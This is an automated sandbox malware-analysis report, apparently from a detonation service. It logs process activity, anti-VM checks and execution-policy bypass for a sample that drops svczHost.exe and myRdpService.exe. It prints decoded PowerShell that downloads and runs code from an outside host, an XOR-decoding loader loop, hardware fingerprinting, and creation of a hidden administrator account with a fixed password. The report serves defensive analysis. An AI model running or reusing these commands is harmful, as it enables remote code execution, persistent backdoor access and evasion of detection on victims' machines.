        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries memory information (via WMI often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\Temp\svczHost.exeMemory allocated: 15199C60000 memory reserve | memory write watch
        Source: C:\Windows\Temp\myRdpService.exeMemory allocated: 12A37980000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9904Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9898Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9920
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9893
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9927
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9902
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 9898 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8264Thread sleep count: 9920 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8472Thread sleep count: 9893 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2432Thread sleep count: 9927 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep count: 9902 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\net1.exeLast function: Thread delayed
        Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
        Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
        Source: powershell.exe, 0000000D.00000002.2971436736.00000226E4019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
        Source: powershell.exe, 0000000D.00000002.2971436736.00000226E4019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
        Source: powershell.exe, 00000002.00000002.2806222414.000001AC37A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
        Source: powershell.exe, 0000000D.00000002.2971436736.00000226E4019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000D.00000002.3418771818.00000226FB84A000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.00000151999E1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3308973206.0000018B69ED4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: powershell.exe, 00000008.00000002.2659602766.00000269215E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
        Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
        Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
        Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
        Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="
        Encrypted powershell cmdline option found
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TEXt.EnCodiNG]::UTF8.GetStRing((iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL0tR")))).CoNTeNt))
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f876791";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TEXt.EnCodiNG]::UTF8.GetStRing((iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL0tR")))).CoNTeNt))Jump to behavior
